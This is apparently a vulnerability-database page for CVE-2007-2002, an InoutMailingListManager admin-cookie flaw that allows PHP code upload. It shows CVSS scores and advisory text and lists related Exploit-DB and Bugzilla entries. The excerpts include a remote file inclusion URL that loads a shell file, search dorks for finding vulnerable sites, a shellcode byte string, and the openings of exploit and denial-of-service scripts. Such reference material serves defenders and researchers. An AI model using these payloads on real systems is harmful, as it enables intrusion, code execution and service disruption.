CVE-2007-2002
published 2007-04-12CVE-2007-2002: InoutMailingListManager 3.1 and earlier allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by…
PriorityP340medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.01%
78.4th percentile
InoutMailingListManager 3.1 and earlier allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by setting an arbitrary admin cookie.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| inoutmailinglistmanager | inoutmailinglistmanager | <= 3.1 | — |
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vendor_redhat5.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-82x2-77j4-6g2v: InoutMailingListManager 3
ghsa_unreviewed·2022-05-01
CVE-2007-2002 [MEDIUM] GHSA-82x2-77j4-6g2v: InoutMailingListManager 3
InoutMailingListManager 3.1 and earlier allows remote attackers to access certain restricted functionality, and upload and execute arbitrary PHP code, by setting an arbitrary admin cookie.
Red Hat
Flash plugin DNS rebinding
vendor_redhat·2007-10-08·CVSS 5.0
CVE-2007-5275 [MEDIUM] Flash plugin DNS rebinding
Flash plugin DNS rebinding
The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause a victim machine to establish TCP sessions with arbitrary hosts via a Flash (SWF) movie, related to lack of pinning of a hostname to a single IP address after receiving an allow-access-from element in a cross-domain-policy XML document, and the availability of a Flash Socket class that does not use the browser's DNS pins, aka DNS rebinding attacks, a different issue than CVE-2002-1467 and CVE-2007-4324.
No detection rules found.
Exploit-DB
Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal
exploitdb·2007-11-29·CVSS 7.5
CVE-2002-0252 [HIGH] Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal
Apple QuickTime 7.2/7.3 (OSX/Windows) - RSTP Response Universal
---
# Copyright (C) 2007 Subreption LLC. All rights reserved.
# Visit http://blog.subreption.com for exploit development notes.
#
# References:
# http://www.milw0rm.com/exploits/4648 (original Microsoft Windows code)
# http://www.milw0rm.com/exploits/4651 (recent Microsoft Windows exploit)
# From Metasploit: apple_quicktime_rtsp_response.rb (by MC and HD Moore)
# http://nvd.nist.gov/nvd.cfm?cvename=CVE-2002-0252
# BID: https://www.securityfocus.com/bid/26549
#
# Notes:
# Payload badchars: \x00 \x09 \x0a \x0d \x20 \x22 \x25 \x26 \x27 \x2b \x2f
# \x3a \x3c \x3e \x3f \x40
#
# The example addresses and data will trigger an IDS signature easily.
# Remove them if you're not testing, and change padding sizes accordingly.
# Use the
Exploit-DB
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
exploitdb·2007-10-22
CVE-2007-5627 Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
Socketmail 2.2.8 - 'fnc-readmail3.php' Remote File Inclusion
---
Vulnerability Type: Remote File Inclusion
Vulnerable file: /mail/content/fnc-readmail3.php
Exploit URL: http://localhost/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: __SOCKETMAIL_ROOT
Line number: 399
Lines:
} else {
include_once($__SOCKETMAIL_ROOT."/content/fnc-readmail.std.php");
}
GrEeTs To sHaDoW sEcUrItY TeAm, str0ke
BiG sHoUt OuT tO udplink.net
FoUnD By BiNgZa
DoRk:"Powered by SocketMail Lite version 2.2.8. Copyright © 2002-2006"
DORK2: "Powered by SocketMail"
[email protected]
shadow.php0h.com
# milw0rm.com [2007-10-22]
Exploit-DB
AtomixMP3 2.3 - '.pls' Local Buffer Overflow
exploitdb·2007-09-05
CVE-2007-4803 AtomixMP3 2.3 - '.pls' Local Buffer Overflow
AtomixMP3 2.3 - '.pls' Local Buffer Overflow
---
0x77394540 jmp esp in mswsock.dll Winxp Pro Version 2002
exploit : [A x 516] +[EIP - jmp esp - 4] + [Nops -10] + [Shellcode ]
By : 0x58
greetz : miyyet,,diablos5s5,,vxroot,,Str0ke,,Metasploit
Moroccan Hackers !
*/
# win32_exec - EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x84".
"\xd1\xfe\xd8\x83\xeb\xfc\xe2\xf4\x78\x39\xba\xd8\x84\xd1\x75\x9d".
"\xb8\x5a\x82\xdd\xfc\xd0\x11\x53\xcb\xc9\x75\x87\xa4\xd0\x15\x91".
"\x0f\xe5\x75\xd9\x6a\xe0\x3e\x41\x28\x55\x3e\xac\x83\x10\x34\xd5".
"\x85\x13\x15\x2c\xbf\x85\xda\xdc\xf1\x34\x75\x87\xa0\xd0\x15\xbe".
"\x0f\xdd\xb5\x53\xdb\xcd\xff\x33\x0f\xcd\x75\xd9\x6f\x58\xa2\xfc".
"\x80\x12\xcf\x18\xe
Exploit-DB
InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
InoutMailingListManager 3.1 - Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
Exploit-DB
PMB Services 3.0.13 - Multiple Remote File Inclusions
exploitdb·2007-03-09
CVE-2007-1415 PMB Services 3.0.13 - Multiple Remote File Inclusions
PMB Services 3.0.13 - Multiple Remote File Inclusions
---
____________________ ___ ___ ________
\_ _____/\_ ___ \ / | \\_____ \
| __)_ / \ \// ~ \/ | \
| \\ \___\ Y / | \
/_______ / \______ /\___|_ /\_______ /
\/ \/ \/ \/
.OR.ID
ECHO_ADV_68$2007
[ECHO_ADV_68$2007] PMB Services
- - Invalid include function at opac_css/includes/author_see.inc.php :
--------------------opac_css/includes/author_see.inc.php------------------------
<?php
// +-------------------------------------------------+
// © 2002-2004 PMB Services / www.sigb.net [email protected] et contributeurs (voir www.sigb.net)
// +-------------------------------------------------+
// $Id: author_see.inc.php,v 1.32 2006/12/29 16:10:04 touraine37 Exp $
// affichage du detail pour un auteur
require_once($base_path.'/includes/templates
Exploit-DB
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
exploitdb·2007-01-23
CVE-2007-0548 Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service
---
#!/usr/bin/env python
import socket
print "-----------------------------------------------------------------------"
print "Sami HTTP Server HTTP 404 - Object not found Denial of Service"
print "url: http://www.karjasoft.com"
print "author: shinnai"
print "mail: shinnai[at]autistici[dot]org"
print "site: http://shinnai.altervista.org"
print ""
print "The server is unable to handle more than 2002 requests to nonexistents"
print "files, pages, folders etc."
print "When the number of requests exceed the 2002, it stops to answer,
stops"
print "to write to log file and the admin will be unable to kick or ban
users."
print "The only thing you can do is to kill the process."
print "-----------------------------------------
Exploit-DB
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree
exploitdb·2002-05-29
CVE-2002-2007 Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree
Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree
---
source: https://www.securityfocus.com/bid/4878/info
Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation.
Under some circumstances, Tomcat may yield sensitive information about the web server configuration. When the realPath.jsp page is accessed, it may leak information. Upon being accessed, the realPath.jsp page will display the web root directory of the Tomcat implementation.
http://example.com/test/realPath.jsp
Exploit-DB
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure
exploitdb·2002-05-29
CVE-2002-2007 Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure
Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure
---
source: https://www.securityfocus.com/bid/4876/info
Apache Tomcat is a freely available, open source web server maintained by the Apache Foundation.
Under some circumstances, Tomcat may yield sensitive information about the web server configuration. When the source.jsp page is passed a malformed request, it may leak information. This information may include the web root directory, and possibly a directory listing.
http://example.com:80/examples/jsp/source.jsp??
http://example.com:80/examples/jsp/source.jsp?/jsp/
Exploit-DB
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure
exploitdb·2002-05-29
CVE-2002-2007 Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure
Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure
---
source: https://www.securityfocus.com/bid/4877/info
Apache Tomcat is a freely available, open source web server maintained by
the Apache Foundation.
When Apache Tomcat is installed with a default configuration, several example files are also installed. When some of these example files are requested without any input, they will return an error containing the absolute path to the server's web root.
The attacker can submit a request in one of the following formats:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/te
Bugzilla
CVE-2007-5275 Flash plugin DNS rebinding
bugzilla·2007-11-05·CVSS 5.0
CVE-2007-5275 [MEDIUM] CVE-2007-5275 Flash plugin DNS rebinding
CVE-2007-5275 Flash plugin DNS rebinding
Common Vulnerabilities and Exposures assigned an identifier CVE-2007-5275 to the following vulnerability:
The Adobe Macromedia Flash 9 plug-in allows remote attackers to cause a victim machine to establish TCP sessions with arbitrary hosts via a Flash (SWF) movie, related to lack of pinning of a hostname to a single IP address after receiving an allow-access-from element in a cross-domain-policy XML document, and the availability of a Flash Socket class that does not use the browser's DNS pins, aka DNS rebinding attacks, a different issue than CVE-2002-1467 and CVE-2007-4324.
References:
http://crypto.stanford.edu/dns/dns-rebinding.pdf
Discussion:
Issue was addressed in supported products by:
https://rhn.redhat.com/errata/RHSA-2007-1126.html
Bugzilla
A number of tomcat issues
bugzilla·2007-05-09·CVSS 5.0
CVE-2005-3164 [MEDIUM] A number of tomcat issues
A number of tomcat issues
A number of issues affected tomcat 4.0.6 as distributed with Stronghold. Most
of these are minor severity, all need triaging:
http://tomcat.apache.org/security-4.html
Information disclosure CVE-2005-3164
Information disclosure CVE-2005-2090
Directory traversal CVE-2007-0450
Cross-site scripting CVE-2007-1358
Cross-site scripting CVE-2006-7196
Directory listing CVE-2006-3835
Cross-site scripting CVE-2005-4838
Denial of service CVE-2005-3510
Denial of service CVE-2003-0866
Information disclosure CVE-2002-2006
Discussion:
closing; Stronghold has reached end of life.
2007-04-12
Published